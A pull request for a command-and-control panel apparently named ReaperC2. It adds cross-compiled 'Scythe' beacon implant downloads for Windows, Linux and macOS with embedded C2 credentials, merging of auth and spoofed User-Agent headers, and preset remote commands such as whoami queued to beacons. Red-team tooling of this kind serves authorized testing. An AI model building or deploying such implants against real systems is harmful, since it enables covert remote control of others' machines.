### PR TITLE
feat(admin): Scythe embed targets, header/dir merge, command presets

### DIFF
--- a/pkg/adminpanel/handlers.go
+++ b/pkg/adminpanel/handlers.go
@@ -125,6 +125,7 @@ func (s *Server) handleLogout(w http.ResponseWriter, r *http.Request) {
 }
 
 // scytheHTTPInput matches Scythe Http CLI flags (see ./Scythe Http -h). Empty strings use defaults in scythebuild (directories/headers generated per client).
+// Goos/Goarch select the embedded binary target (GOOS/GOARCH for go build); empty uses the ReaperC2 server host.
 type scytheHTTPInput struct {
 	Method        string `json:"method"`
 	Timeout       string `json:"timeout"` // HTTP client timeout, e.g. "30s" — independent of heartbeat_interval_sec
@@ -133,6 +134,8 @@ type scytheHTTPInput struct {
 	Headers       string `json:"headers"`
 	Proxy         string `json:"proxy"`
 	SkipTLSVerify bool   `json:"skip_tls_verify"`
+	Goos          string `json:"goos"`   // linux, windows, darwin
+	Goarch        string `json:"goarch"` // amd64, arm64
 }
 
 type createBeaconRequest struct {
@@ -224,6 +227,11 @@ func (s *Server) handleCreateBeacon(w http.ResponseWriter, r *http.Request) {
 	if hasPivot && strings.TrimSpace(httpOpts.Proxy) == "" && pivotProxy != "" {
 		httpOpts.Proxy = pivotProxy
 	}
+	embedGOOS, embedGOARCH, err := scytheEmbedTargetFromInput(req.ScytheHTTP, nil)
+	if err != nil {
+		jsonError(w, http.StatusBadRequest, err.Error())
+		return
+	}
 	tokens := scythebuild.BuildHTTPEmbedTokens(base, clientID, secret, httpOpts)
 	scythe := scythebuild.FormatCLIExample(tokens)
 	profileName := strings.TrimSpace(req.ProfileName)
@@ -245,6 +253,8 @@ func (s *Server) handleCreateBeacon(w http.ResponseWriter, r *http.Request) {
 		ScytheHTTPHeaders:       httpOpts.Headers,
 		ScytheHTTPProxy:         httpOpts.Proxy,
 		ScytheHTTPSkipTLSVerify: httpOpts.SkipTLSVerify,
+		ScytheEmbedGOOS:         embedGOOS,
+		ScytheEmbedGOARCH:       embedGOARCH,
 		ScytheExample:           scythe,
 		BeaconBaseURL:           base,
 		HeartbeatURL:            hURL,
@@ -315,6 +325,24 @@ func scytheHTTPOptionsFromInput(in *scytheHTTPInput, prof *dbconnections.BeaconP
 	return o
 }
 
+func scytheEmbedTargetFromInput(in *scytheHTTPInput, prof *dbconnections.BeaconProfile) (goos, goarch string, err error) {
+	gos := ""
+	garch := ""
+	if prof != nil {
+		gos = prof.ScytheEmbedGOOS
+		garch = prof.ScytheEmbedGOARCH
+	}
+	if in != nil {
+		if strings.TrimSpace(in.Goos) != "" {
+			gos = strings.TrimSpace(in.Goos)
+		}
+		if strings.TrimSpace(in.Goarch) != "" {
+			garch = strings.TrimSpace(in.Goarch)
+		}
+	}
+	return scythebuild.NormalizeEmbedTarget(gos, garch)
+}
+
 type scytheEmbeddedRequest struct {
 	ClientID   string           `json:"client_id"`
 	ScytheHTTP *scytheHTTPInput `json:"scythe_http,omitempty"`
@@ -371,7 +399,12 @@ func (s *Server) handleAPIScytheEmbedded(w http.ResponseWriter, r *http.Request)
 	}
 	base := beaconPublicBaseURL()
 	tokens := scythebuild.BuildHTTPEmbedTokens(base, doc.ClientId, doc.Secret, httpOpts)
-	bin, err := scythebuild.BuildEmbeddedBinary(ctx, tokens)
+	embedGOOS, embedGOARCH, err := scytheEmbedTargetFromInput(req.ScytheHTTP, prof)
+	if err != nil {
+		jsonError(w, http.StatusBadRequest, err.Error())
+		return
+	}
+	bin, err := scythebuild.BuildEmbeddedBinary(ctx, tokens, embedGOOS, embedGOARCH)
 	if err != nil {
 		log.Printf("admin: scythe embedded build: %v", err)
 		jsonError(w, http.StatusInternalServerError, "build failed: "+err.Error())
@@ -381,7 +414,7 @@ func (s *Server) handleAPIScytheEmbedded(w http.ResponseWriter, r *http.Request)
 	if len(short) > 8 {
 		short = short[:8]
 	}
-	filename := fmt.Sprintf("Scythe-embedded-%s.bin", short)
+	filename := scythebuild.SuggestedAttachmentFilename(short, embedGOOS, embedGOARCH)
 	w.Header().Set("Content-Type", "application/octet-stream")
 	w.Header().Set("Content-Disposition", fmt.Sprintf(`attachment; filename=%q`, filename))
 	w.Header().Set("Content-Length", strconv.Itoa(len(bin)))

--- a/pkg/adminpanel/handlers_commands.go
+++ b/pkg/adminpanel/handlers_commands.go
@@ -22,6 +22,9 @@ const maxQueuedCommandLen = 8000
 // beaconSelfDestructCommand is queued for Scythe to exit on next heartbeat delivery.
 const beaconSelfDestructCommand = "sendmetojesusdog"
 
+// ScytheBuiltinCommands are single-token commands handled by Scythe’s HTTP beacon built-ins (queue exactly as shown).
+var ScytheBuiltinCommands = []string{"whoami", "groups", "environment"}
+
 func beaconSelectLabel(c dbconnections.BeaconClientDocument) string {
 	label := strings.TrimSpace(c.BeaconLabel)
 	if label == "" {
@@ -58,16 +61,28 @@ func (s *Server) handleCommandsPage(w http.ResponseWriter, r *http.Request) {
 	if opts.Len() == 0 {
 		opts.WriteString(`<option value="">(no beacons — generate one under Beacons)</option>`)
 	}
+	var builtinOpts strings.Builder
+	builtinOpts.WriteString(`<option value="">— Custom command below —</option>`)
+	for _, b := range ScytheBuiltinCommands {
+		builtinOpts.WriteString(`<option value="`)
+		builtinOpts.WriteString(template.HTMLEscapeString(b))
+		builtinOpts.WriteString(`">`)
+		builtinOpts.WriteString(template.HTMLEscapeString(b))
+		builtinOpts.WriteString(`</option>`)
+	}
 
 	body := `
 <h1>Beacon commands</h1>
-<p class="muted">Queue shell-style commands for a beacon. They are returned on the next <code>GET /heartbeat/&lt;uuid&gt;</code> and cleared when delivered (same as the <code>Commands</code> array on the client document). When the beacon posts results to <code>POST /receive/&lt;uuid&gt;</code>, output is stored below for review.</p>
+<p class="muted">Queue commands for a beacon. They are returned on the next <code>GET /heartbeat/&lt;uuid&gt;</code> and cleared when delivered (same as the <code>Commands</code> array on the client document). When the beacon posts results to <code>POST /receive/&lt;uuid&gt;</code>, output is stored below for review. <strong>Scythe</strong> supports built-in commands (<code>whoami</code>, <code>groups</code>, <code>environment</code>) — use the preset dropdown or type any shell-style command.</p>
 <div class="card">
   <h2>Queue a command</h2>
   <label>Beacon</label>
   <select id="beaconSel">` + opts.String() + `</select>
+  <label>Scythe built-in (optional)</label>
+  <select id="cmdPreset">` + builtinOpts.String() + `</select>
+  <p class="muted" style="font-size:.85rem;margin:.35rem 0 0">Choosing a built-in fills the command field; you can still edit it before queueing.</p>
   <label>Command</label>
-  <textarea id="cmdText" placeholder="e.g. whoami" rows="4"></textarea>
+  <textarea id="cmdText" placeholder="e.g. whoami, or use built-in preset above" rows="4"></textarea>
   <button type="button" class="btn" id="queueBtn">Queue command</button>
   <p id="cmdMsg" class="muted" style="margin-top:.75rem"></p>
 </div>
@@ -93,7 +108,7 @@ function renderPending(data) {
     el.innerHTML = '<p class="muted">No beacons registered.</p>';
     return;
   }
-  var html = '<table><thead><tr><th>Beacon</th><th>Client ID</th><th>Pending</th></tr></thead><tbody>';
+  var html = '<table><thead><tr><th>Beacon</th><th>Client ID</th><th>Pending commands</th></tr></thead><tbody>';
   for (var i = 0; i < data.beacons.length; i++) {
     var b = data.beacons[i];
     var pend = (b.pending && b.pending.length) ? b.pending.map(function(c) { return escapeHtml(c); }).join('<br>') : '<span class="muted">—</span>';
@@ -113,6 +128,10 @@ async function loadPending() {
   if (!r.ok) { document.getElementById('pendingWrap').innerHTML = '<p class="muted">' + (j.error || r.statusText) + '</p>'; return; }
   renderPending(j);
 }
+document.getElementById('cmdPreset').onchange = function() {
+  var v = document.getElementById('cmdPreset').value;
+  if (v) { document.getElementById('cmdText').value = v; }
+};
 document.getElementById('queueBtn').onclick = async function() {
   var sel = document.getElementById('beaconSel');
   var cid = sel.value;
@@ -120,12 +139,13 @@ document.getElementById('queueBtn').onclick = async function() {
   msg.textContent = '';
   if (!cid) { msg.textContent = 'Select a beacon.'; return; }
   var cmd = document.getElementById('cmdText').value;
-  if (!cmd.trim()) { msg.textContent = 'Enter a command.'; return; }
+  if (!cmd.trim()) { msg.textContent = 'Enter a command or choose a built-in preset.'; return; }
   var r = await fetch('/api/beacon-commands', { method: 'POST', credentials: 'same-origin', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ client_id: cid, command: cmd }) });
   var j = await r.json().catch(function() { return {}; });
   if (r.ok) {
     msg.textContent = 'Queued.';
     document.getElementById('cmdText').value = '';
+    document.getElementById('cmdPreset').value = '';
     loadPending();
     if (document.getElementById('histSel').value === cid) { loadCommandHistory(); }
   } else {

--- a/pkg/adminpanel/handlers_portal.go
+++ b/pkg/adminpanel/handlers_portal.go
@@ -106,6 +106,11 @@ func (s *Server) handleBeaconsPage(w http.ResponseWriter, r *http.Request) {
 			rows.WriteString(strconv.Itoa(p.HeartbeatIntervalSec))
 			rows.WriteString(`</div></div>`)
 		}
+		if p.ScytheEmbedGOOS != "" || p.ScytheEmbedGOARCH != "" {
+			rows.WriteString(`<div class="creds-row"><div class="creds-label">Scythe.embedded target</div><div class="mono">`)
+			rows.WriteString(template.HTMLEscapeString(p.ScytheEmbedGOOS + "/" + p.ScytheEmbedGOARCH))
+			rows.WriteString(`</div></div>`)
+		}
 		rows.WriteString(`<div class="creds-row"><div class="creds-label">Beacon base URL</div><div class="mono">`)
 		rows.WriteString(template.HTMLEscapeString(p.BeaconBaseURL))
 		rows.WriteString(`</div></div>`)
@@ -156,13 +161,24 @@ func (s *Server) handleBeaconsPage(w http.ResponseWriter, r *http.Request) {
   <input id="stimeout" value="30s" class="mono" placeholder="30s">
   <label>Request body (JSON string for <code>-body</code>; optional)</label>
   <textarea id="sbody" rows="2" class="mono" placeholder=""></textarea>
-  <label>Directories (comma-separated paths; leave blank for <code>/heartbeat/&lt;ClientId&gt;,/heartbeat</code>)</label>
-  <input id="sdirs" class="mono" placeholder="e.g. /heartbeat/uuid,/heartbeat">
-  <label>Headers (comma-separated <code>key:value</code>; leave blank for default auth headers)</label>
-  <textarea id="shdrs" rows="2" class="mono" placeholder="Content-Type:application/json,X-Client-Id:…"></textarea>
+  <label>Extra directories (comma-separated; appended after required <code>/heartbeat/&lt;ClientId&gt;,/heartbeat</code>)</label>
+  <input id="sdirs" class="mono" placeholder="e.g. /custom/path — required heartbeat paths are always included">
+  <label>Extra headers (comma-separated <code>key:value</code>; merged after required <code>Content-Type</code>, <code>X-Client-Id</code>, <code>X-API-Secret</code>)</label>
+  <textarea id="shdrs" rows="2" class="mono" placeholder="e.g. User-Agent:Mozilla/5.0… — do not repeat auth headers"></textarea>
   <label>Proxy (<code>-proxy</code>; optional; pivot proxy is applied when parent is set if this is empty)</label>
   <input id="sproxy" class="mono" placeholder="host:port">
   <label><input type="checkbox" id="stls"> Skip TLS verify (<code>-skip-tls-verify</code>)</label>
+  <label>Embedded binary: target OS (<code>GOOS</code>)</label>
+  <select id="sgoos">
+    <option value="linux" selected>Linux</option>
+    <option value="windows">Windows</option>
+    <option value="darwin">macOS (Darwin)</option>
+  </select>
+  <label>Embedded binary: architecture (<code>GOARCH</code>)</label>
+  <select id="sgoarch">
+    <option value="amd64" selected>amd64 (x86_64)</option>
+    <option value="arm64">arm64 (aarch64)</option>
+  </select>
   </details>
   <label>Profile name (optional)</label>
   <input id="pname" placeholder="Leave blank for an auto name (beacon-xxxxxxxx-YYYYMMDD-hhmmss)">
@@ -186,7 +202,9 @@ function scytheHttpPayload() {
     directories: document.getElementById('sdirs').value.trim(),
     headers: document.getElementById('shdrs').value.trim(),
     proxy: document.getElementById('sproxy').value.trim(),
-    skip_tls_verify: document.getElementById('stls').checked
+    skip_tls_verify: document.getElementById('stls').checked,
+    goos: document.getElementById('sgoos').value.trim(),
+    goarch: document.getElementById('sgoarch').value.trim()
   };
 }
 var lastClientId = null;

--- a/pkg/dbconnections/portal.go
+++ b/pkg/dbconnections/portal.go
@@ -40,6 +40,8 @@ type BeaconProfile struct {
 	ScytheHTTPHeaders       string    `bson:"scythe_http_headers,omitempty"`
 	ScytheHTTPProxy         string    `bson:"scythe_http_proxy,omitempty"`
 	ScytheHTTPSkipTLSVerify bool      `bson:"scythe_http_skip_tls_verify,omitempty"`
+	ScytheEmbedGOOS         string    `bson:"scythe_embed_goos,omitempty"`
+	ScytheEmbedGOARCH       string    `bson:"scythe_embed_goarch,omitempty"`
 	ScytheExample           string    `bson:"scythe_example"`
 	BeaconBaseURL           string    `bson:"beacon_base_url"`
 	HeartbeatURL            string    `bson:"heartbeat_url"`

--- a/pkg/scythebuild/scythebuild.go
+++ b/pkg/scythebuild/scythebuild.go
@@ -11,17 +11,19 @@ import (
 	"os"
 	"os/exec"
 	"path/filepath"
+	"runtime"
 	"strings"
 )
 
 // HTTPOptions mirrors Scythe Http CLI flags (see ./Scythe Http -h).
 // Timeout is the HTTP client timeout (e.g. "30s"), independent of ReaperC2 heartbeat interval.
+// Headers and Directories are merged with required auth and heartbeat paths (see MergeScytheHTTPHeaders / MergeScytheHTTPDirectories).
 type HTTPOptions struct {
 	Method        string
 	Timeout       string // e.g. "5s", "2m"; default "30s"
 	Body          string
-	Directories   string // comma-separated; default /heartbeat/<clientID>,/heartbeat
-	Headers       string // comma-separated key:value; default uses client id + secret
+	Directories   string // comma-separated extra paths; always merged with /heartbeat/<clientID>,/heartbeat
+	Headers       string // comma-separated extra key:value pairs; always merged with Content-Type + X-Client-Id + X-API-Secret
 	Proxy         string
 	SkipTLSVerify bool
 }
@@ -29,6 +31,35 @@ type HTTPOptions struct {
 // DefaultHTTPOptions returns Method GET and Timeout "30s".
 func DefaultHTTPOptions() HTTPOptions {
 	return HTTPOptions{Method: "GET", Timeout: "30s"}
+}
+
+// MergeScytheHTTPHeaders returns Scythe -headers value: required C2 auth headers plus any extra pairs from userHeaders.
+// If userHeaders already looks like a full header line (includes X-API-Secret and X-Client-Id), it is used as-is so legacy copy-paste does not duplicate auth.
+func MergeScytheHTTPHeaders(clientID, secret, userHeaders string) string {
+	base := fmt.Sprintf("Content-Type:application/json,X-Client-Id:%s,X-API-Secret:%s", clientID, secret)
+	u := strings.TrimSpace(userHeaders)
+	if u == "" {
+		return base
+	}
+	// Full pasted -headers from an example (already contains auth).
+	if strings.Contains(u, "X-API-Secret:") && strings.Contains(u, "X-Client-Id:") {
+		return u
+	}
+	return base + "," + u
+}
+
+// MergeScytheHTTPDirectories returns Scythe -directories value: required heartbeat paths plus any extra paths from userDirs.
+// If userDirs already includes this client's /heartbeat/<clientID> path, it is used as-is (full pasted example).
+func MergeScytheHTTPDirectories(clientID, userDirs string) string {
+	base := fmt.Sprintf("/heartbeat/%s,/heartbeat", clientID)
+	u := strings.TrimSpace(userDirs)
+	if u == "" {
+		return base
+	}
+	if strings.Contains(u, "/heartbeat/"+clientID) {
+		return u
+	}
+	return base + "," + u
 }
 
 // BuildHTTPEmbedTokens returns argv tokens for Scythe after the program name (subcommand "Http" first).
@@ -41,14 +72,8 @@ func BuildHTTPEmbedTokens(baseURL, clientID, secret string, o HTTPOptions) []str
 	if timeout == "" {
 		timeout = "30s"
 	}
-	dirs := strings.TrimSpace(o.Directories)
-	if dirs == "" {
-		dirs = fmt.Sprintf("/heartbeat/%s,/heartbeat", clientID)
-	}
-	headers := strings.TrimSpace(o.Headers)
-	if headers == "" {
-		headers = fmt.Sprintf("Content-Type:application/json,X-Client-Id:%s,X-API-Secret:%s", clientID, secret)
-	}
+	dirs := MergeScytheHTTPDirectories(clientID, o.Directories)
+	headers := MergeScytheHTTPHeaders(clientID, secret, o.Headers)
 
 	out := []string{
 		"Http",
@@ -138,8 +163,47 @@ func firstOrPlaceholder(c []string) string {
 	return c[0]
 }
 
+// Allowed cross-compile targets for embedded Scythe (GOOS/GOARCH).
+var (
+	validEmbedGOOS   = map[string]bool{"linux": true, "windows": true, "darwin": true}
+	validEmbedGOARCH = map[string]bool{"amd64": true, "arm64": true}
+)
+
+// NormalizeEmbedTarget validates and lowercases GOOS/GOARCH. Empty values default to the build host.
+func NormalizeEmbedTarget(goos, goarch string) (string, string, error) {
+	goos = strings.ToLower(strings.TrimSpace(goos))
+	goarch = strings.ToLower(strings.TrimSpace(goarch))
+	if goos == "" {
+		goos = runtime.GOOS
+	}
+	if goarch == "" {
+		goarch = runtime.GOARCH
+	}
+	if !validEmbedGOOS[goos] {
+		return "", "", fmt.Errorf("invalid goos %q (supported: linux, windows, darwin)", goos)
+	}
+	if !validEmbedGOARCH[goarch] {
+		return "", "", fmt.Errorf("invalid goarch %q (supported: amd64, arm64)", goarch)
+	}
+	return goos, goarch, nil
+}
+
+// SuggestedAttachmentFilename returns a download filename for the embedded binary.
+func SuggestedAttachmentFilename(clientShort, goos, goarch string) string {
+	ext := ".bin"
+	if goos == "windows" {
+		ext = ".exe"
+	}
+	return fmt.Sprintf("Scythe-embedded-%s-%s-%s%s", clientShort, goos, goarch, ext)
+}
+
 // BuildEmbeddedBinary runs go build in the Scythe tree with EmbeddedArgv set to tokens.
-func BuildEmbeddedBinary(ctx context.Context, tokens []string) ([]byte, error) {
+// goos/goarch select the target platform (cross-compilation); use "" for host OS/ARCH.
+func BuildEmbeddedBinary(ctx context.Context, tokens []string, goos, goarch string) ([]byte, error) {
+	goos, goarch, err := NormalizeEmbedTarget(goos, goarch)
+	if err != nil {
+		return nil, err
+	}
 	b64, err := EmbedArgvBase64(tokens)
 	if err != nil {
 		return nil, err
@@ -154,16 +218,22 @@ func BuildEmbeddedBinary(ctx context.Context, tokens []string) ([]byte, error) {
 		return nil, err
 	}
 	defer os.RemoveAll(tmpDir)
-	outPath := filepath.Join(tmpDir, "Scythe.embedded")
+	outName := "Scythe.embedded"
+	if goos == "windows" {
+		outName = "Scythe.embedded.exe"
+	}
+	outPath := filepath.Join(tmpDir, outName)
 
 	ldflags := "-X github.com/BuildAndDestroy/Scythe/pkg/userinput.EmbeddedArgv=" + b64
 	cmd := exec.CommandContext(ctx, "go", "build", "-trimpath", "-ldflags", ldflags, "-o", outPath, "./cmd")
 	cmd.Dir = root
-	cmd.Env = os.Environ()
+	env := os.Environ()
+	env = append(env, "CGO_ENABLED=0", "GOOS="+goos, "GOARCH="+goarch)
+	cmd.Env = env
 	var stderr bytes.Buffer
 	cmd.Stderr = &stderr
 	if err := cmd.Run(); err != nil {
-		return nil, fmt.Errorf("go build in %s: %w\n%s", root, err, strings.TrimSpace(stderr.String()))
+		return nil, fmt.Errorf("go build GOOS=%s GOARCH=%s in %s: %w\n%s", goos, goarch, root, err, strings.TrimSpace(stderr.String()))
 	}
 	return os.ReadFile(outPath)
 }

--- a/pkg/scythebuild/scythebuild_test.go
+++ b/pkg/scythebuild/scythebuild_test.go
@@ -27,6 +27,64 @@ func TestResolveScytheSourceDir_SCYTHE_SRC(t *testing.T) {
 	}
 }
 
+func TestMergeScytheHTTPHeaders(t *testing.T) {
+	const cid = "68902a9a-e40f-4f15-a101-995800fa39b9"
+	const sec = "secrethex"
+	baseWant := "Content-Type:application/json,X-Client-Id:" + cid + ",X-API-Secret:" + sec
+	if g := MergeScytheHTTPHeaders(cid, sec, ""); g != baseWant {
+		t.Fatalf("empty user: got %q want %q", g, baseWant)
+	}
+	extra := `User-Agent:Mozilla/5.0`
+	if g := MergeScytheHTTPHeaders(cid, sec, extra); g != baseWant+","+extra {
+		t.Fatalf("with extra: got %q", g)
+	}
+	full := baseWant + ",User-Agent:x"
+	if g := MergeScytheHTTPHeaders(cid, sec, full); g != full {
+		t.Fatalf("legacy full headers: got %q want %q", g, full)
+	}
+}
+
+func TestMergeScytheHTTPDirectories(t *testing.T) {
+	const cid = "68902a9a-e40f-4f15-a101-995800fa39b9"
+	baseWant := "/heartbeat/" + cid + ",/heartbeat"
+	if g := MergeScytheHTTPDirectories(cid, ""); g != baseWant {
+		t.Fatalf("empty user: got %q want %q", g, baseWant)
+	}
+	if g := MergeScytheHTTPDirectories(cid, "/shit"); g != baseWant+",/shit" {
+		t.Fatalf("with extra: got %q", g)
+	}
+	if g := MergeScytheHTTPDirectories(cid, baseWant); g != baseWant {
+		t.Fatalf("legacy full dirs: got %q", g)
+	}
+}
+
+func TestNormalizeEmbedTarget(t *testing.T) {
+	goos, goarch, err := NormalizeEmbedTarget("linux", "arm64")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if goos != "linux" || goarch != "arm64" {
+		t.Fatalf("got %s/%s", goos, goarch)
+	}
+	_, _, err = NormalizeEmbedTarget("plan9", "amd64")
+	if err == nil {
+		t.Fatal("expected error for invalid GOOS")
+	}
+	_, _, err = NormalizeEmbedTarget("linux", "ppc64")
+	if err == nil {
+		t.Fatal("expected error for invalid GOARCH")
+	}
+}
+
+func TestSuggestedAttachmentFilename(t *testing.T) {
+	if g, w := SuggestedAttachmentFilename("abc", "windows", "amd64"), "Scythe-embedded-abc-windows-amd64.exe"; g != w {
+		t.Fatalf("got %q want %q", g, w)
+	}
+	if g, w := SuggestedAttachmentFilename("abc", "linux", "arm64"), "Scythe-embedded-abc-linux-arm64.bin"; g != w {
+		t.Fatalf("got %q want %q", g, w)
+	}
+}
+
 func TestResolveScytheSourceDir_REAPERC2_ROOT(t *testing.T) {
 	dir := t.TempDir()
 	scythe := filepath.Join(dir, "third_party", "Scythe")


### PR DESCRIPTION
- Cross-compile Scythe.embedded: GOOS/GOARCH from UI, stored on beacon profiles, suggested download filename per platform (.exe on Windows).
- Merge extra -headers/-directories with required X-Client-Id, X-API-Secret, and /heartbeat/<ClientId>,/heartbeat; legacy full paste still honored.
- Commands page: dropdown presets for Scythe built-ins (whoami, groups, environment).
- Beacons form copy: label fields as extra merged after required auth/paths.

Tests: scythebuild merge and embed-target helpers.
Made-with: Cursor